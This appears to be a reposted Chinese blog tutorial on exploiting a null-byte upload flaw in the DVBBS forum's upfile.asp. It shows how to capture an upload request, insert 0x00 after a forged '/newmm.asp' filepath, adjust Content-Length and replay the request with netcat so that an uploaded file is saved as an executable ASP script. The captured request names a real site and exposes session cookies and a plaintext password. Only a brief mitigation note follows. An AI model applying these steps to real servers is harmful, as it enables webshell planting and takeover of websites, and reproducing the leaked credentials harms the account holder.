PHP文件伪造ASP命名,PHP/ASP上传漏洞探究_php

于 2021-03-13 02:15:31 发布
阅读量62 收藏
点赞数
文章标签: PHP文件伪造ASP命名

1:传漏洞利用的原理只是针对form格式上传的asp和php脚本***

nc(netcat)

用于提交数据包

dos界面下运行:

nc -vv www.***.com 80<1.txt

-vv: 回显

http://www.gaodaima.com/44848.htmlPHP/ASP上传漏洞探究_php

80:  www端口

1.txt: 就是你要发送的数据包

(更多使用方法请查看本区的帖子)

wse(wsockexpert)

对本机端口的监视,抓取ie提交的数据包

2:漏洞原理

下面例子假设的前提

www主机:  www.***.com;

bbs路径 :  /bbs/

漏洞源于对动网上传文件的研究,建议有一定编程经验的

看看dvbbs的upfile.asp文件,没有必要全部看懂

upfile是通过生成一个form表上传,如下

用到的变量:

filepath 默认值uploadface 属性hiden

act      默认值upload     属性hiden

file1    就是你要传的那个文件

关键是 filepath 这个变量!

默认情况下我们的文件上传到www.***.com/bbs/uploadface/

文件是用你的上传时间命名的,就是upfile里的这一句

filename=formpath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&rannum&"."&fileext

--------------------------------------

我们知道计算机里面的数据是一""为标致的用过c语言的都知道

char data[]="bbs"

这个data数组长度是4: b b s

如果我们构造filepath如下,会怎么样呢?

filepath="/newmm.asp"

我们在2004.09.24.08.24传的文件就会发生变化

没有改时:

_blank>http://www.***.com/bbs/uploadface/200409240824.jpg

用我们构造的filepath时:

_blank>http://www.***.com/newmm.asp/200409240824.jpg

这样当服务器接收filepath数据时,检测到newmm.asp后面的

就理解为filepath的数据就结束了

这样我们上传的文件,比如c:.asp

就保存成: _blank>http://www.***.com/newmm.asp

3:后期补充

漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行

有很多网站只是加了n个hiden属性的变量对付网上公布的upfile.exe就是那个

上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。

而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具

自己改wse抓到的包里的filepath变量,然后在用nc提交。。。

就算他加n个hiden变量也于事无补。

当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结

就是我们的新理论诞生的时候!

4:详细实例:

---------------------

一、wse抓包结果(存到1.txt里):

post /bbs/upphoto/upfile.asp http/1.1

accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

referer: _blank>http://www.xin126.com/bbs/upphoto/upload.asp

accept-language: zh-cn

content-type: multipart/form-data; boundary=-----------7d423a138d0278

accept-encoding: gzip, deflate

user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)

host: _blank>www.xin126.com

content-length: 1969

connection: keep-alive

cache-control: no-cache

cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf; iscome=1; gamvancookies=1; regtime=2004%2d9%2d24+3%3a39%3a37; username=szjwwwww; pass=5211314; dl=0; userid=62; ltstyle=0; logintry=1; userpass=eb03f6c72908fd84

-----------------------------7d423a138d0278

content-disposition: form-data; name="filepath"

../medias/myphoto/

-----------------------------7d423a138d0278

... ...

上传

---------------7d423a138d0278-----------------

二、ultraedit打开1.txt改数据:

......

-----------------------------7d423a138d0278

content-disposition: form-data; name="filepath"

/newmm.asp                 <===这个黑色代表一个空格是 0x20,改成0x00就可以了

......

----------------------------

三、重新计算cookies长度,然后nc提交

nc -vv _blank>www.xin126.com 80 <1.txt

ultraedit是一个16位编辑器网上可以下载得到

我们主要用来写那个结束标致: ====>16位表示:0x00或者00h

其实你改的时候就直接再filepath的结尾处加个00就ok了

计算cookies长度===>你把fillepath改了之后、肯定是或+或―cookies的长度变了

......

host: _blank>www.xin126.com

content-length: 1969  <======就是这个

connection: keep-alive

cache-control: no-cache

......

计算会吧?一个字母、数字就是1

对于上传漏洞提出的解决思路:(仅供参考)

1、一般的上传是把上传路径作为一个变量来处理

===>我们的对策就是把filepath变成常量。。。

这个方法是目前最有效的(我认为的)

2、加强对于的处理,原来我们是读到这里就结束

我们继续读直道下一个变量开始的地方,处理就ok了

附:NC Usage:

监听外部主机

nc [-options] hostname port[s] [ports] ...

监听本地主机

nc -l -p port [options] [hostname] [port]

options:

-d              detach from console, stealth mode

-e prog         inbound program to exec [dangerous!!]

-g gateway      source-routing hop point[s], up to 8

-g num          source-routing pointer: 4, 8, 12, ...

-h              this cruft

-i secs         delay interval for lines sent, ports scanned

-l              listen mode, for inbound connects

-l              listen harder, re-listen on socket close

-n              numeric-only ip addresses, no dns

-o file         hex dump of traffic

-p port         local port number

-r              randomize local and remote ports

-s addr         local source address

-t              answer telnet negotiation

-u              udp mode

-v              verbose [use twice to be more verbose]

-w secs         timeout for connects and final net reads

-z              zero-i/o mode [used for scanning]

port numbers can be individual or ranges: m-n [inclusive]

欢迎大家阅读《PHP/ASP上传漏洞探究_php》,跪求各位点评,若觉得好的话请收藏本文,by 搞代码

原创文章,转载请注明: 转载自搞代码

e7ce419cf2d6ad34d01da2ceb8829eed.png

微信 赏一包辣条吧~

023a57327877fb4402bcc76911ec18ea.png

支付宝 赏一听可乐吧~

weixin_39891438
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 伪造ip以及url来路信息方法汇总
12-18
php 来路伪造 第一种:php_curl 开启方法: 1、找到php.ini, 修改extension=php_curl.dll 把前面的分号去掉; 2、把php_curl.dll, php5ts.dll, libeay32.dll, ssleay32.dll 复制到 windows/system32目录下 然后重启...
PHP文件伪造ASP命名,window_ASP伪造REFERER,代码: <%Function GetBody(weburl) - phpStudy
weixin_34113453的博客
03-13 57
ASP伪造REFERER代码:Function GetBody(weburl)Set Retrieval = Server.CreateObject("MSXML2.XMLHTTP")With Retrieval.Open "Get", weburl, False, "", "".setRequestHeader "referer","http://www.devdao.com/"'想改什么就改什...
DVWA之PHP文件上传漏洞(File Upload)
热门推荐
Mi1k7ea
01-22 1万+
文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器。简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用。 首先保存一句话木马为1.php文件: 另外对于上传文件,可在DVWA的服务器中(本人用的是Metasploitable虚拟机)以下路径找到: /var/www/dvwa/hackab
php 跳转伪造referer,php伪造来源HTTP_REFERER的实例探讨
weixin_30013175的博客
03-10 775
本节介绍下php伪造referer(HTTP_REFERER)的方法。环境:Apache/2.2.8 + PHP/5.2.5 + Windows XP系统,本地测试。首先,在网站虚拟根目录下建立1.php和2.php两个文件。1,文件 1.php/*** 伪造http_referer来源* edit www.jbxue.com* at 2013/7/4*/$host = '127.0.0.1';$...
php文件上传漏洞
wssmiss的博客
03-06 3901
大佬原文地址:https://blog.csdn.net/ski_12/article/details/54669614 文件上传漏洞 文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器。简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用。 DVWA中的文件上传漏洞 首先保存一句话木马为1.php文件: &lt...
RQCMS文章网站系统最新官方版
04-04
其中的文件后缀,文件名,都是可以自定义,从而实现了完全隐藏网站程序或伪造其它的网站程序,方便多个站点间拥有不同的个性。 2.多站点 使用一个网站系统可以建很多站,每个站都有自己的特定的设置,不同的模板,...
RQCMS v2.4 正式版
10-23
其中的文件后缀,文件名,都是可以自定义,从而实现了完全隐藏网站程序或伪造其它的网站程序,方便多个站点间拥有不同的个性。2.多站点使用一个网站系统可以建很多站,每个站都有自己的特定的设置,不同的模板,不同...
RQCMS v2.1 正式版.rar
08-29
其中的文件后缀,文件名,都是可以自定义,从而实现了完全隐藏网站程序或伪造其它的网站程序,方便多个站点间拥有不同的个性。 2.多站点 使用一个网站系统可以建很多站,每个站都有自己的特定的设置,不同的模板,...
wapiti3:工具使用
03-25
一旦获得URL,表单及其输入的列表,Wapiti就像一个模糊器,注入有效负载以查看脚本是否易受攻击截屏功能文件公开(本地和远程包含/需要,fopen,readfile ...) 数据库注入(PHP / JSP / ASP SQL注入和XPath注入) ...
关于__Federico Milano 的电力系统分析工具箱.zip
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
mlab-upenn 研究小组的心脏模型模拟.zip
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
混合图像创建大师matlab代码.zip
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
中序遍历二叉树-java版本
04-26
在Java中,实现二叉树的中序遍历同样可以通过递归来完成。中序遍历的顺序是:首先递归地中序遍历左子树,然后访问根节点,最后递归地中序遍历右子树。 在这段代码中,Node类定义了二叉树的节点,BinaryTree类包含一个指向根节点的指针和inOrder方法,用于递归地进行中序遍历。printInOrder方法调用inOrder方法并打印出遍历的结果。 在Main类中,我们创建了一个示例二叉树,并调用printInOrder方法来输出中序遍历的结果。输出应该是:4 2 5 1 3,这表示中序遍历的顺序是左子树(4),然后是根节点(2),接着是右子树的左子树(5),然后是右子树的根节点(1),最后是右子树的右子树(3)。
无头单向非循环链表的实现(SList.c)
最新发布
04-26
无头单向非循环链表的实现(函数定义文件
两个有序链表的合并pta
04-26
"PTA" 通常指的是一种在线编程平台,例如“Pata”或者某些特定学校或组织的编程练习与自动评测系统。在这种平台或系统中,学生或程序员会提交代码来解决各种问题,然后系统会自动运行并评测这些代码的正确性。 当提到“两个有序链表的合并PTA”时,这通常意味着在PTA平台上解决一个特定的问题,即合并两个有序链表。具体任务可能是给定两个已按升序排序的链表,要求编写代码来合并这两个链表,形成一个新的有序链表。
在 Matlab 中创建的图形工具可改善航空航天数据的可视化.zip
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
搜索引擎的设计与实现.zip
04-26
搜索引擎的设计与实现
年公司财务会计岗位工作总结(二).docx
04-26
工作总结,新年计划,岗位总结,工作汇报,个人总结,述职报告,范文下载,新年总结,新建计划。
uedito 1.4.3 php漏洞
11-25
攻击者可以通过该漏洞利用一些常见的文件上传攻击技术,比如修改文件后缀、伪造文件类型等,来绕过文件上传的限制,从而上传恶意的PHP文件。一旦上传成功并且被执行,攻击者就可以获取对服务器的控制权,进行各种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值